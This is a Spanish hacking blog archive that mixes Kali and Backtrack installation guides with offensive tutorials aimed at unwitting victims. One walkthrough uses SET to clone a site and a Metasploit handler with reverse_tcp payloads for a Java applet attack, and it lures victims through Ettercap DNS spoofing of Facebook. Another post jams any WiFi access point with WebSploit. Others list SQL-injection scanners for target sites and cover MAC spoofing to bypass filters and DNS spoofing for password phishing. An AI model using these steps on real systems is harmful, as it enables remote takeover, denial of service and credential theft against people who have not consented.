APK Hacks | Para expertos y principiantes!: Backtrack
Mostrando entradas con la etiqueta Backtrack. Mostrar todas las entradas
Mostrando entradas con la etiqueta Backtrack. Mostrar todas las entradas

14 de diciembre de 2013

El Raspberry Pi es una computadora ARM de gama baja y barata. A pesar de sus menos-que-estelares pliego de especificaciones, la capacidad de financiación hace que sea un excelente opción para un sistema Linux pequeño y pueda hacer mucho más que actuar como un PC multimedia.



Kali Linux en Raspberry Pi – Manera Fácil


Si todo lo que quiere hacer es instalar Kali en su Raspberry Pi, siga estas instrucciones:


1. Obtenga una tarjeta SD de 8 GB (o más). Tarjetas Clase 10 son altamente recomendadas.

root@kali:~ dd if=kali-pi.img of=/dev/sdb bs=512k


2. Baje la imagen Kali Linux para Raspberry Pi de nuestra area downloads.

3. Use el utilitario dd para crear la imagen que ira en su tarjeta SD. En nuestro ejemplo, nosotros asumimos que el dispositivo de almacenamiento esta localizado en /dev/sdb. Cambie este si es necesario.

Alerta! Este proceso borrara su tarjeta SD. Si usted escoge un dispositivo de almacenamiento distinto, podria estar borrando su disco duro.

 Este proceso puede tomarse su tiempo dependiendo de la velocidad de su dispositivo USB y tamaño de la imagen. Una vez que la operación dd este completa, reinicie su Rasberry Pi con su tarjeta SD conectada. Estaras habilitado para loguearte en Kali (root / toor) y digitar startx. Y eso es, esta listo!
FUENTE ORIGINAL: http://es.docs.kali.org/06-arquitectura-arm-de-kali/instalando-kali-arm-en-un-raspberry-pi

13 de diciembre de 2013

Si decide instalar Kali Linux en una VirtualBox, tendrá que seguir las siguientes instrucciones en orden para una exitosa instalación de las herramientas adicionales de huésped.


Siempre debe usar la última versión de VirtualBox para tomar ventaja de las mejoras incluidas en las actualizaciones de compatibilidad y estabilidad mejorada, tanto de las adiciones de huésped como el núcleo de la aplicación.

Instalación de las adiciones de huésped de VirtualBox en Kali Linux

Con el fin de tener un apropiado funcionamiento del mouse y la integración de pantalla así como compartir carpetas con el sistema principal, necesitara instalar las adiciones de huésped de VirtualBox.
Una vez que haya arrancado su máquina virtual de Kali Linux, abra una ventana de terminal y ejecute el siguiente comando para instalar las cabeceras del kernel de Linux.
 apt-get update && apt-get install -y linux-headers-$(uname -r)
Una vez completado esto, se pueden adjuntar los Guest Additions CD-Rom. Esto puede ser hecho seleccionando ‘Devices’ del Menu de VirtualBox y seleccionando ‘Install Guest Additions.’ Esto montara la iso GuestAdditions a el virtual CD Drive en su maquina virtual Kali Linux. Cuando se le pida autoejecutar el CD, haga clic en el botón Cancel.
VirtualBox-Cancel-Auto-Run
Desde una ventana de terminal, copie el archivo VboxLinuxAdditions.run de Guest Additions CD-Rom a la ruta en el sistema local asegurandose que sea ejecutable y el archivo pueda correr al iniciar la instalación.
cp /media/cd-rom/VBoxLinuxAdditions.run /root/
chmod 755 /root/VBoxLinuxAdditions.run
cd /root
./VboxLinuxAdditions.run
VirtualBox-VBox-Additions-Install
Reinicie su VM Kali Linux para completar la instalación de las adiciones de huespéd. Ahora debería tener completa integración del mouse y pantalla, así como la capacidad de compartir carpetas con el sistema principal.

Creación de carpetas compartidas en el sistema principal

Para compartir carpetas de su sistema principal con tu VM Kali Linux, hay unos pocos pasos que se deben completar.
Desde el administrador de la VirtualBox, seleccione su instancia de Kali Linux VM y haga clic en el enlace ‘Shared Folders’ en el panel derecho de la ventana. Esto abrirá una ventana emergente para agregar carpetas. Dentro de esta ventana, haga clic en el icono para agregar una carpeta.
En la caja de texto de la ruta de carpeta, proporcione la ruta a la carpeta que desea compartir, o haga clic en la flecha descendente para navegar hacia la ruta de su sistema principal. Seleccione las casillas de verificación que permiten el ‘Auto-mount’ y ‘Make Permanent’ y haga clic en el botón OK ambas veces cuando se le solicite.
Figure-20-Shared-folder-config
Sus carpetas compartidas estarán ahora disponibles en su directorio de medios. Puedes crear un marcador o un enlace para facilitar el acceso al directorio.
VirtualBox-Shared-folder-in-Kali

12 de diciembre de 2013

El arranque y la instalación de Kali desde una memoria USB es nuestro método preferido y es la manera más rápida de correrlo. Para hacer esto, primero tenemos que crear la imagen ISO de Kali en una unidad de USB. Si a usted le gustaría añadir persistencia a la memoria USB de Kali Linux, por favor lea el documento completo antes de proceder a crear su imagen.

Preparativos para la copia USB

1. Descarga Kali linux.

2. En Windows, descargar Win32 Disk Imager.

3. No se necesita software especial si usa Linux como su sistema operativo.

4.Una memoria USB (con por lo menos 2GB de capacidad).

Procedimiento para la instalación de Kali Linux desde una memoria USB

Creando una imagen de Kali en Windows

1. Conecte su memoria USB en el puerto USB de Windows. Inicie el software Disk Imager Win32.

2. Elija el archivo ISO de Kali Linux con el que creará la imagen y verifique que la unidad USB que será sobrescriba es la correcta.

kali-usb-install-windows

3. Una vez que la imagen haya sido creada, expulsar de forma segura la unidad USB desde la máquina Windows. Ahora puede utilizar la memoria USB para arrancar Kali Linux.

Creando una imagen de Kali en Linux

La creación de una memoria USB desde la cual pueda arrancar Kali Linux en un entorno de Linux es fácil. Una vez que haya descargado el archivo ISO de Kali, puede utilizar dd para copiarlo a la memoria USB:
ADVERTENCIA. Aunque el proceso de creación de imágenes de Kali en una memoria USB es muy fácil, usted puede fácilmente destruir particiones arbitrarias con dd si usted no entiende lo que está haciendo. Queda advertido.
1. Conecte el dispositivo USB al puerto USB de su ordenador Linux.

2. Compruebe que la ruta de su dispositivo de almacenamiento USB con dmesg.

3. Proceda (con cuidado) a crear la imagen de Kali Linux en el dispositivo USB:
dd if=kali.iso of=/dev/sdb
Eso es todo, de verdad! Ahora puede arrancar en un entorno Kali Live / Instalador usando el dispositivo USB.

Agregando persistencia a su memoria USB de Kali Linux

La adición de persistencia (la capacidad de guardar archivos y los cambios a través de arranques en directo) a su imagen de Kali Linux puede ser muy útil en ciertas situaciones. Para agregar persistencia a su memoria USB de Kali Linux, siga estos pasos.En este ejemplo, asumimos nuestra unidad USB es /dev/sdb. Si desea agregar la persistencia, usted necesitará un dispositivo USB más grande que el que encontrarás en nuestros requisitos anteriores.
1. Cree la imagen de Kali Linux en su memoria USB como se ha explicado anteriormente, utilizando el “Método de Linux” y dd.

2. Cree y formatee una partición adicional en la memoria USB. En nuestro ejemplo, podemos utilizar gparted invocando:
  1. gparted /dev/sdb
3. Su esquema de particionamiento actual debe ser similar a este:
usb-persistence-basic-partitioning
4. Proceda a formatear la nueva partición para ser utilizada para la persistencia. En nuestro ejemplo, hemos utilizado todo el espacio disponible restante. Asegúrese de que la etiqueta de volumen de la partición recién creada sea la de la persistencia, y dele formato utilizando el sistema de archivos ext4.

usb-persistence-creating-partition5. Una vez que el proceso se haya completado, monte su partición persistente USB utilizando los siguientes comandos:

  1. mkdir /mnt/usb
  2. mount /dev/sdb2 /mnt/usb
  3. echo "/ union" >> /mnt/usb/persistence.conf
  4. umount /mnt/usb
6. Conecte la memoria USB en el equipo que desea arrancar. Asegúrese de que su BIOS arrancará desde el dispositivo USB. Cuando la pantalla de arranque de Linux Kali aparezca, seleccione “boot en vivo” en el menú (no presione enter), y presione el botón de tabulación. Esto le permitirá editar los parámetros de arranque. Agregue la palabra “persistence” al final de la línea de parámetro de arranque cada vez que quiera montar su almacenamiento permanente. 

usb-persistence



























FUENTE ORIGINAL: http://es.docs.kali.org/installation-es/instalacion-de-kali-linux-desde-una-memoria-usb

11 de diciembre de 2013

Requisitos de instalación de Kali Linux

Instalar Kali Linux en su ordenador es un proceso fácil. Primero necesitará hardware que sea compatible en su ordenador. Kali es soportado en las siguientes plataformas: i386, en amd64, y en ARM (tanto armel como armhf). Los requisitos de hardware son mínimos y se enumeran a continuación, aunque mejor hardware naturalmente ofrece un mejor rendimiento. Las imágenes i386 tienen un núcleo predeterminado PAE, por lo que pueden ejecutarse en sistemas con más de 4 GB de RAM. Descarge Kali Linux y, o bien grabe el ISO en un DVD, o prepare una memoria USB con Kali Linux Live como medio de instalación. Si usted no tiene una unidad de DVD o un puerto USB de su ordenador.

Requisitos previos de instalación

  • Un mínimo de 8 GB de espacio en disco para la instalación de Kali Linux.
  • Para las arquitecturas i386 y amd64, un mínimo de 512 MB de RAM.
  • Lectora de CD/DVD / Soporte para iniciar desde una memoria USB

Preparándose la instalación

  1. Descarge Kali Linux.
  2. Queme el Kali Linux ISO a DVD o prepare una memoria USB con Kali Linux Live como medio de instalación.
  3. Asegúrese de que su ordenador está configurado para arrancar desde un CD / USB en el BIOS.

Procedimiento de instalación de Kali Linux

  1. Para iniciar la instalación, arranque con el medio de instalación elegido. Usted debe ser recibido con la pantalla de arranque de Kali. Elegir si desea proceder con una instalación gráfica o en modo texto. En este ejemplo, hemos elegido una instalación gráfica.
    Kali Install
  2. Seleccione el idioma que desee y luego su país de localización. También se le pedirá que configure su teclado con el mapa de teclado adecuado.

  3. localechooser_languagelist_0
  4. El programa de instalación copiará la imagen en su disco duro, probará las interfaces de red, y luego le pedirá que introduzca un nombre de host para el sistema. En el siguiente ejemplo, hemos entrado “Kali”, como el nombre de host.

  5. netcfg_get_hostname_0
  6. Introduzca una contraseña robusta para la cuenta de root y cree las cuentas adicionales que desee.

  7. kali-linux-install-02
  8. Configure su zona horaria.

  9. time_zone_0
  10. El instalador probará sus discos, y le ofrecerá cuatro opciones. En nuestro ejemplo, vamos a usar el disco entero en nuestro ordenador y no la configuración de LVM (Logical Volume Manager). Los usuarios experimentados pueden utilizar el método manual de partición para una configuración más granular.

  11. partman-auto_init_automatically_partition_0
  12. Entonces tendrá una última oportunidad para revisar la configuración de su disco antes de que el instalador haga que los cambios sean irreversibles. Después de hacer clic en Continuar, el instalador irá a trabajar y usted tendrá una instalación casi terminada.

  13. kali-linux-install-03
  14. Configurar espejos de red. Kali utiliza un repositorio central para distribuir aplicaciones. Tendrá que introducir la información de proxy adecuado según sea necesario.
    NOTA! Si selecciona “NO” en esta pantalla, NO usted no será capaz de instalar paquetes desde repositorios de Kali.
    kali-linux-install-04
  15. El próximo paso es instalar GRUB.

  16. kali-linux-install-05
  17. Por último, haga clic en Continuar para reiniciar en su nueva instalación de Kali.

  18. finish-install_reboot_in_progress_0

Kali Linux ya debería estar instalado y funcionando correctamente

FUENTE ORIGINAL: http://es.docs.kali.org/installation-es/instalacion-de-kali-linux-en-un-disco-duro


16 de noviembre de 2013

Las paginas que les voy a compartir a continuación  sirven para escanear cualquier pagina web que deseen en busca de vulnerabilidades a ataques SQL, el método mas empleado por todos los hackers del mundo. 

El primer paso para poder llevar a cabo este ataque es comprobar que la web que queremos atacar realmente sea vulnerable para ahorrarnos tiempo y muchos intentos en vano. Estas paginas son las mejores actualmente, son gratis, y muy fáciles de usar:
  • http://www.be007.gigfa.com/scanner/scanner.php
  • http://www.sunmagazin.com/tools/hack/SQLI-Scan
  • http://scanner.drie88.tk
  • http://wolfscps.com/gscanner.php
  • http://localvn.biz/Tools/tools/Hack-Shop/SQLI-Scan

14 de noviembre de 2013

Un Ataque de Denial of Service (Denegación de Servicios), es un ataque a un sistema de computadoras o red que como resultado provoca que un servicio o recurso sea inaccesible a los usuarios. Normalmente provoca la pérdida de la conexión de red por el consumo del ancho de banda de la red de la víctima. En este tutorial voy a mostrar como realizar este ataque a cualquier punto de acceso WiFi para que todos los usuarios que estén conectados se desconecte y para que nadie se pueda conectar nuevamente (durante el periodo de tiempo en el que el ataque este funcionando, no es permanente).


Requisitos:
  • Backtrack (Descarga)
  • No hace falta tener acceso a la red, solo necesitas que este a tu alcance.

Instrucciones:

  1. Una vez en Backtrack, tenemos que comprobar que tenemos instalado WebSploit. Para ello nos dirigimos a Applications >> BackTrack >> Exploitation Tools >> Web Explotation Tolls y aca debería encontrarse WebSploit, si en tu caso es asi, continua directamente en el paso 3. De lo contrario tendremos que instalarlo.
  2. Para instalar WebSploit, primero tendremos que descargarlo aquí. Una vez descargado extraemos el archivo en el directorio "/pentest/web/". Despues de extraerlo debemos hacer click derecho en el archivo websploit, seleccionamos "Properties" y en la ventana emergente nos dirigimos a la pestaña "Permissions" y seleccionamos la casilla "Allow executing file as program". Una vez hecho esto, solo nos queda ejecutar Websploit. Para ello, abrimos la consola/terminal de Backtrack y ejecutamos los siguientes comandos:
    • cd /pentest/web/websploit
    • ./websploit
  3. Luego de ejecutar Websploit, vamos a ejecutar los siguientes comandos:
    • use wifi/wifi_jammer
    • set essid [nombre essid del wifi]
    • set bssid [numero bssid del wifi]
    • set channel [your channel number]
    • RUN
NOTA: 
  • BSSID: Significa Basic Service Set Identifier y se trata de la dirección MAC (física) del Access Point al que nos conectamos. Lo podemos obtener mirando la tabla ARP si estamos conectados o mediante el comandoo "airodump-ng" para capturar el tráfico que genere.
  • ESSID: Significa Extended Service Set ID y es el nombre identificable de la red.
  • Para obtener el BSSID y el ESSID en Windows vamos a cmd y ejecutamos: netsh wlan show networks mode=bssid 


10 de noviembre de 2013

¿Nunca quisiste tener Backtrack como tu Sistema Operativo Principal y aprovechar toda la potencia de tu ordenador?  Instala cualquier distribución de Backtrack en tu ordenador directamente en tu disco duro como tu sistema operativo principal (sin windows) en muy pocos pasos. Certificado por el equipo de Backtrack Oficial!

bACKTRACK


NOTA: Este método de instalación es el mas sencillo y mas rapido. Una vez instalado, ten en cuenta que el sistema Backtrack reemplazara por completo a Windows o a tu sistema operativo anterior. 

Requisitos:

  • Descargar el ISO de Backtrack original AQUÍ 
  • Disponer de alguna forma para bootear Backtrack en nuestro ordenador desde la BIOS. La opción mas fácil es desde un PenDrive USB, aquí te mostramos como hacerlo: Como Instalar Backtrack en Memoria USB
Instrucciones: 
  1. Booteamos Backtrack desde nuestro USB como explicamos en el tutorial mas arriba y una vez booteado, tipeamos "startx" (sin comillas) para acceder a la interfaz grafica.
  2. Una vez dentro de la interfaz grafica, nos dirigimos a escritorio y ejecutamos el archivo “install.sh”. Si no lo encontramos podemos abrir la consola y ejecutamos el comando: “ubiquity”.
  3. A continuación nos aparecerá una ventana similar a la de arriba. Aquí lo que debemos hacer es indicar nuestra ubicación geográfica y el layout de nuestro teclado.                         
  4. Ahora nos va a pedir que seleccionemos la partición donde vamos a instalar Backtrack pero como lo queremos instalar en todo el disco, le damos a "Use entire disk"
  5. Le damos a continuar y procedemos con l instalacion. Una vez terminada, el sistema se reiniciara y cuando vuelva a arrancar, nospedira un usuario y contraseña, y para ello utilizareemos: root como usuario y toor como contraseña:
  6. LISTO! Ahora ya tenemos Backtrack instalado completamente en nuestro ordenador.



7 de marzo de 2013

Como todos sabemos, MetaSploit viene por defecto instalado en Backtrack, y como instalar solo MetaSploit era bastante complicado aquí les traigo un tutorial para instalar Backtrack 5 en Android


TUTORIAL AQUÍBacktrack 5 en Android Tutorial

6 de marzo de 2013

Java Applet Attack es uno de mis ataques preferidos. Es muy efectivo y discreto pero lo que mas me gusta de el es lo fácil que es llevarlo a cabo. Solo necesitas tener Backtrack y tener instalado solo 2 aplicaciones: SET y MetaSploit


Java applet Attack afecta:
  • Windows Systems
  • Linux Systems and
  • Mac OS X
Instrucciones:

1. Primero ejecutamos la aplicacion SET yendo a: Applications >> BackTrack >> Exploitation Tools >> Social Engineering Tools >> Social Engineering Toolkits >> SET                                      



2. Una vez iniciado SET, elegimos la opción 2) Website Attack Vector. Para ello ponemos 2 y le damos a enter.
3. Ahora nos aparecerá otro menú como el de la imagen de abajo en el que seleccionaremos la opción 1) Java Applet Attack Method (de la misma manera que el paso anterior reemplazando el 2 por el 1)     

                                                                              
4. A continuación aparecerá otro menú en el que seleccionaremos la opción 2) Site Cloner  

                               


5. Ahora tendremos que introducir la pagina que queremos clonar para que sea nuestra pagina infectada. Podemos introducir cualquiera por ejemplo: www.apk-hacks.blogspot.com     

  

6. El siguiente paso consiste en elegir que Payload vamos a utilizar, en este caso vamos a seleccionar la siguiente:                                


7. A continuacion vamos a tener que elegir que metodo de encripcion vamos a querer. Nosotros vamos a usar 16) Backdoor Executable (BEST)


8. Lo siguiente va a ser elegir el puerto que queramos utilizar. (podemos darle directamente a enter para que SET elija el puerto)


9. Una vez seleccionado el puerto, SET iniciara MetaSploit


10. Una vez iniciado MetaSploit tendremos que ejecutar los siguientes comandos:

  • use exploit/multi/handler
  • set payload windows/meterpreter/reverse_tcp (para ataques a Windows)
  • set payload linux/x86/shell/reverse_tcp (para ataques a Linux)
  • set LHOST "nuestra ip local"
  • set LPORT "puerto que querramos utilizar"
  • set ExitOnSession false
  • exploit -j


11. Ahora lo unico que nos queda es hacer que nuestra victima entre a nuestra pagina infectada, para eso podemos utilizar Ettercap para rediccionar cualquier pagina, por ejemplo: www.facebook.com , a nuestra pagina infectada que sera la indicada en la imagen superior. Para saber como hacerlo lee DNS Spoofing con Ettercap en Backtrack Tutorial

12. Una vez que logramos que nuestra victima entre a nuestra pagina infectada, se le solicitará en una pequeña ventana que ejecute una aplicación de Java que requiere el sitio infectado, el cual la victima desconoce, por lo tanto el %99 de las personas la ejecutara. Cuando la victima le da a ejecutar, automáticamente se conecta a el ordenador del atacante proporcionándole control total de la victima.



13. Asi se vera cuando la victima haya caído en nuestra trampa:



14. Como vimos en la imagen anterior, se creo una sesion cuando recivimos la conexion de la victima. Lo que debemos hacer ahora para tomar el control de esa sesion es ejecutar el siguiente comando:
  • session -i 1



















5 de marzo de 2013

Macchanger es una aplicación muy util para cambiar nuestra dirección MAC de la placa de red. Esto se puede utilizar para muchas cosas pero la mas conocida y popular es para acceder a redes WiFi con filtro MAC.


GNU / Linux:

  1. Lo primero que tenemos que hacer es descargar la aplicación macchanger. Para eso nos dirigimos a terminal y introducimos el siguiente comando:  apt-get install macchanger
  2. Una vez instalado, tenemos que averiguar nuestra interfaz de red, para ello ejecutamos el siguiente comando: airmon-ng
    3.   Aquí tendremos que buscar la interfaz que este en uso en nuestro ordenador, para ello nos fijamos cual de ellas tiene asociada nuestra ip local. En mi caso, como ven en la imagen de arriba, la mía es eth0 (si la tuya es diferente reemplaza eth0 por tu interfaz en los pasos que siguen)
   4.   Una vez obtenida nuestra interfaz de red, procederemos a cambiar nuestra dirección MAC. Para ello ejecutamos los siguientes comandos: (igual que en la imagen de arriba)
  • ifconfig eth0 down 
  • macchanger --mac 00:00:00:00:00:00 (introducir la MAC que queramos tener)
  • ifconfig eth0 up


   5.   Listo! Ahora, para comprobar que funciono ejecuta: ifconfig y comprueba el resultado



Windows:

  1. Para cambiar nuestra dirección MAC en windows usaremos un programa llamado "Windows MAC Address Changer".
  2. Una vez descargado, lo instalamos y seguimos los pasos a continuación:
  3. Primero seleccionamos nuestra Interfaz de Red: 
  4. Le damos a "Change" y nos llevara al la siguiente pagina 
  5. Seleccione su sistema operativo (si su sistema operativo Windows no está en la lista a continuación, sólo tienes que seleccionar "Windows XP") 
  6. Ahora introducimos la dirección MAC que queramos tener y le damos a "Apply". Para que los cambios tengan efecto tenemos que reiniciar el equipo o desactivar y activar las Conecciones de Red


26 de febrero de 2013

   Lo primero que tenemos que hacer para instalar BacTrack en un pendrive o memoria usb, es descargar UNetbootin, programa gratuito que no requiere instalación nos permitirá instalar backtrack en una memoria usb para que luego podamos usarlo en nuestro ordenador, Y también vamos a necesitar la imagen ISO de cualquier distribución  de Backtrack ( todas son compatibles ).

24 de febrero de 2013

   DNS Spoofing es un ataque que consiste en que el atacante funcione como intermediario entre el punto de acceso de la red (router) y la victima que tiene que obviamente, tiene que estar conectada a la misma red que el atacante. Al funcionar como intermediario, lo que hacemos es redireccionar peticiones especificas o todas, a la dirección que nosotros queramos. Este método es útil para poder llevar a cabo otros hacks como phishing, Java applet attack, etc. Ejemplo: la victima solicita la pagina www.facebook.com y el atacante tiene la posibilidad de redireccionar esa petición a un servidor local por ejemplo: 192.168.0.104:8080 donde tenemos alojado una página similar a Facebook modificada para guardar las contraseñas que la victima introduzca. 

21 de febrero de 2013

   Los diccionarios de contraseñas son muy útiles cuando se trata de crackear alguna contraseña realizando ataques de Fuerza Bruta los cuales consisten en probar todas las combinaciones de contraseñas existentes hasta dar con la combinación correcta. A continuación les mostraremos como crear su propio diccionario con combinaciones y caracteres personalizables en Backtrack.

20 de febrero de 2013

  ¿Nunca te preguntaste si podías instalar Backtrack 5 junto con Windows? 
Ahora te enseñaremos como hacerlo, y para ello utilizaremos una herramienta muy conocida: Unetbootin. 
Unetbootin es una software multiplataforma que permite la instalación de varias distribuciones GNU/Linux desde una memoria USB o desde un disco duro USB.

20 de junio de 2012

En este tutorial voy a explicar cómo se puede "hackear" Windows con BackTrack. Esto se aplica para Windows XP como para Windows Vista y Windows 7.

En primer lugar usted necesita para descargar BackTrack.


17 de junio de 2012

Requiere un dispositivo con acceso ROOT!

En teoría, esta versión es casi universal, así que si tienes un dispositivo con Android que debería funcionar.
El crédito va para el equipo de BackTrack y miembro de XDA anantshri (que tiene las habilidades), que construyó la base de archivo de imagen.

BackTrack es un sistema operativo basado en Ubuntu Linux que se utiliza para las pruebas de seguridad (también conocido como piratería) y análisis forense digital. Soy estudiante de una maestría en seguridad informática, por lo que me encanta este sistema operativo ... que puede hacer cosas increíbles. Encienda el Wi-Fi y que usted puede hacer los análisis de redes avanzadas y las pruebas directamente desde su teléfono, no requiere ordenador portátil. Para mí esto es hella-útil.

Pero además de ser sólo un sistema operativo , es también totalmente basada en Ubuntu, por lo que se puede ejecutar como un escritorio, incluyendo la ejecución de Firefox y otras aplicaciones de Linux.
Bueno chicos mi servidor tenía un error de hardware (lol, mi suerte), así que aquí está el contenido de la página web:

La Descarga

Esta instalación de BackTrack 5 está disponible como un archivo comprimido que tendrá que ser extraído. Recomiendo descargar este usando Chrome o Firefox. Internet Explorer a menudo no juega bien con grandes descargas de HTTP.

La contraseña del usuario root y la contraseña del servidor VNC se establecen en 'root' por defecto!

Mirror 1
Parte 1: http://www.mediafire.com/?1z5sbxdxv3naxp1
Parte 2: http://www.mediafire.com/?0zz1vac0k59d58p
Parte 3: http://www.mediafire.com/?kxpb7ug0x55ppde

Mirror 2 

 http://www.shenye.co.uk/files/BackTr...sEditionv2.zip

Mirror 3

http://brilldoctor.co.cc/Files/BackT...sEditionv2.zip

Mirror 4 

Parte 1: https://rapidshare.com/files/3602140...onv2.part1.rar
Parte 2: https://rapidshare.com/files/2384880...onv2.part2.rar
Parte 3: https://rapidshare.com/files/3314159...onv2.part3.rar
Parte 4: https://rapidshare.com/files/3073073...onv2.part4.rar
Parte 5: https://rapidshare.com/files/2486943...onv2.part5.rar
Parte 6: https://rapidshare.com/files/3545372...onv2.part6.rar
Parte 7: https://rapidshare.com/files/2371728...onv2.part7.rar
Parte 8: https://rapidshare.com/files/1437974...onv2.part8.rar
Parte 9: https://rapidshare.com/files/1758571...onv2.part9.rar

La Descripción

Si desea ejecutar BackTrack 5 en su dispositivo Android, sigue leyendo, estás en el lugar correcto! Así que la gran noticia es que BackTrack 5 se ejecuta en los teléfonos Android. Hemos sido capaces de ejecutar Ubuntu en estos dispositivos desde hace bastante tiempo también, pero sin duda dar marcha atrás en un teléfono inteligente es simplemente impresionante.



De todos modos, los archivos para el uso de BackTrack 5 en un teléfono con Android han estado funcionando en todo el Internet, pero lamentablemente es una especie de batiburrillo de enlaces que dicen, "ir a descargar este, a continuación, obtener esto, entonces esto, bla, bla, bla". Demasiado confuso para mi cerebro simple, así que he redondeado todo y lo publicó en un solo lugar ... aquí mismo. La versión que aquí tiene todo lo que necesitará para ejecutar BackTrack 5 en su dispositivo Android. También he añadido un montón de cosas para ayudar con la experiencia del usuario que las otras ofertas no incluyen:
Obras en todo el LOOP_SET_FD ioctl no de error que muchas personas han estado recibiendo en los dispositivos Galaxy S (y otros)
Pregunta al usuario si desea una sesión de VNC en el arranque
Inicia el servicio SSH de forma automática y muestra IP del dispositivo en el arranque
Permite a los repositorios de Ubuntu a la aptitud, por lo que puede hacer la instalación del paquete
Agrega vim. En realidad, lo que la distribución no viene con vim por defecto? En serio ...
Establece la resolución de pantalla de 800 × 480 por defecto (debe ser compatible con la mayoría de dispositivos smartphones)

SU

Esto requiere acceso ROOT!
Usted debe ser capaz de "su" en el terminal. Esta capacidad es proporcionada generalmente por el software para el rooting de su teléfono. Para ver si se ha arraigado el teléfono correctamente y está funcionando, vaya a su emulador de terminal y el tipo <enter> "su". Si está trabajando, probablemente obtendrá un mensaje que le pregunta si desea permitir que el emulador de terminal de acceso root. Pulse Aceptar / Sí. Ahora vamos a estar de vuelta en el emulador de terminal. Escriba "whoami" <enter>. Si responde con "root" o "0 uid", entonces usted tiene acceso root.

Busybox
Esto requiere Busybox!
Ya no estoy ofreciendo un instalador para Busybox debido a problemas con el funcionamiento del universalmente, por lo que su lugar usted necesita para ir a buscar un trabajo construirlo e instalarlo (creo que "Instalador Busybox" va a funcionar, pero no probado). Si desea saber si usted tiene Busybox y está funcionando, vaya a su emulador de terminal y el tipo de "su" <enter>, a continuación, "busybox ls" <enter>. Si usted recibe una impresión de todos los archivos en el directorio actual, entonces su Busybox será necesario trabajar con BackTrack 5 muy bien. Si usted obtiene un error ", busybox: not found", eso significa que o bien no tienen Busybox, o no se ha instalado correctamente.

ADVERTENCIA PARA LOS USUARIOS CyanogenMod
Antes de hacer nada, por favor, prueba de soporte ext2 ejecutando (como root, en la terminal) -> "modprobe ext2" <enter>

Si esto no funciona, probablemente el dispositivo carece de soporte ext2 y toda la cosa va a meter la pata, si tratas de correr! Soporte para ext2 en CM se está trabajando.



La Guía de instalación

Activar Wi-Fi y conectarse a un punto de acceso Wi-Fi (* no es necesario, pero BT5 no puede utilizar su plan de datos para acceso a Internet)
Descargue el archivo zip, extraer en cualquier lugar
Después de la extracción tendrá una carpeta "BT5"; copiar esta carpeta a la raíz de la tarjeta SD del teléfono
Pon la carta de nuevo en el teléfono y / o desconectar desde USB
En un emulador de terminal, escriba "su" <enter>, "cd / sdcard/bt5" <enter>
Ahora ya está listo para el rock and roll, así que problema de "sh bt" <enter> (en el futuro para empezar a BT5 saltar por encima de la línea y llegar directamente a este comando)
Si todo está bien ahora va a estar ejecutando BackTrack 5 en su dispositivo Android, usted puede SSH a través de Wi-Fi ('root' password), o acceder a él desde VNC si dijo "Sí" a la pregunta que le pregunta si quería una sesión de VNC
Para obtener una interfaz gráfica para dar marcha atrás en la pantalla de su smartphone, descargar un visor de VNC en el mercado (muchos de ellos son gratuitos), a continuación, conectarse al host "127.0.0.1", puerto "5901", contraseña "root"




Powered by KikBooks Widget